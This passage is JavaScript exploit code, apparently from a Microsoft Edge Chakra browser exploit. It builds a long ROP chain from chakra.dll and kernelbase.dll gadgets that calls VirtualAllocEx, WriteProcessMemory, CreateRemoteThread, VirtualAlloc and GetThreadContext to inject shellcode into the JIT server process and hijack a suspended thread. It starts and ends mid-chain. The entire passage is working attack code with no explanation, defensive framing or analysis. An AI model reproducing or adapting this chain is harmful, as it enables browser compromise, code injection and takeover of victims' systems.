write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
